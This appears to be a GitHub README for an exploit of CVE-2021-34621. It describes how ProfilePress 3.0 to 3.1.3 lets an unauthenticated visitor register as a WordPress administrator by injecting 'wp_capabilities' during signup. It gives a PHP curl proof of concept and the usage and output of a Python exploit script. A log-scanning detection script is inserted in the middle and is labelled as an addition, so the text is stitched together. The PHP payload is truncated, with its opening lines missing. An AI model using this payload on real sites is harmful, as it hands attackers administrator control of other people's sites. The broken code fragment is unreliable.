https://github.com/randomrobbiebf/cve-2021-34621

ProfilePress 3.0 - 3.1.3 - Unauthenticated Privilege Escalation

# CVE-2021-34621
ProfilePress 3.0 - 3.1.3 - Unauthenticated Privilege Escalation

# Description
The plugin's user registration functionality allowed arbitrary user meta, including `wp_capabilities`, to be supplied during registration, which made it possible for users to register as an administrator.

# POC
```

'Hax0r',
'reg_email' => '[email protected]',
'reg_password' => 'password',
'reg_password_present' => 'true',
'reg_first_name' => 'Hax0r',
'reg_last_name' => 'Hax0r',
'wp_capabilities[administrator]' => '1',
'action' => 'pp_ajax_signup',
'melange_id' => ''

]);

$output = curl_exec($ch);
curl_close($ch);
print_r($output);
```
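
A detection sketch for the behaviour described above, added here as an example (it is not part of the original README or the plugin's code): it scans logged POST bodies for `pp_ajax_signup` requests that carry role-related user meta. It goes beyond the single `wp_capabilities` key on this page by also matching custom table prefixes and the `<prefix>user_level` key; the JSON-lines log format, the `method`/`body`/`client_ip` field names and the sample records are assumptions constructed for illustration.

```python
import json
import re
from urllib.parse import parse_qsl

# WordPress stores roles in user meta as "<table prefix>capabilities" and
# "<table prefix>user_level"; the prefix is "wp_" by default but configurable.
ROLE_META = re.compile(r"^[A-Za-z0-9_]*(capabilities|user_level)(\[|$)")
SIGNUP_ACTION = "pp_ajax_signup"  # action value shown in the POC on this page

def suspicious_fields(body):
    """Return role-related field names found in a ProfilePress signup body."""
    fields = parse_qsl(body, keep_blank_values=True)  # also decodes %5B / %5D
    if ("action", SIGNUP_ACTION) not in fields:
        return []  # not a ProfilePress registration request
    return sorted({name for name, _ in fields if ROLE_META.match(name)})

def scan(log_lines):
    """Yield (client_ip, fields) for each logged POST that tries to set a role."""
    for line in log_lines:
        try:
            rec = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip malformed records instead of aborting the scan
        if not isinstance(rec, dict) or rec.get("method") != "POST":
            continue
        hits = suspicious_fields(rec.get("body", ""))
        if hits:
            yield rec.get("client_ip", "?"), hits

# Constructed sample records (assumed log format, documentation IP ranges).
SAMPLE_LOG = [json.dumps(r) for r in [
    {"client_ip": "192.0.2.10", "method": "POST",  # ordinary registration
     "body": "reg_username=alice&reg_password=x&action=pp_ajax_signup"},
    {"client_ip": "203.0.113.5", "method": "POST",  # URL-encoded brackets
     "body": "reg_username=bob&wp_capabilities%5Badministrator%5D=1"
             "&action=pp_ajax_signup"},
    {"client_ip": "198.51.100.9", "method": "POST",  # non-default prefix
     "body": "reg_username=eve&site7_capabilities[editor]=1"
             "&site7_user_level=10&action=pp_ajax_signup"},
    {"client_ip": "192.0.2.44", "method": "POST",  # different AJAX action
     "body": "action=heartbeat&wp_capabilities%5Badministrator%5D=1"},
]] + ["not json"]

if __name__ == "__main__":
    for ip, hits in scan(SAMPLE_LOG):
        print(ip, hits)
```

A hit on a site that ran ProfilePress 3.0 - 3.1.3 is a reason to review the accounts created around that time and their roles.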

Script Usage
---

```
$ python3 CVE-2021-34621.py --url http://wordpress.lan --username test2 --email [email protected] --password test
{"message":"

Registration successful.<\/div>"}
```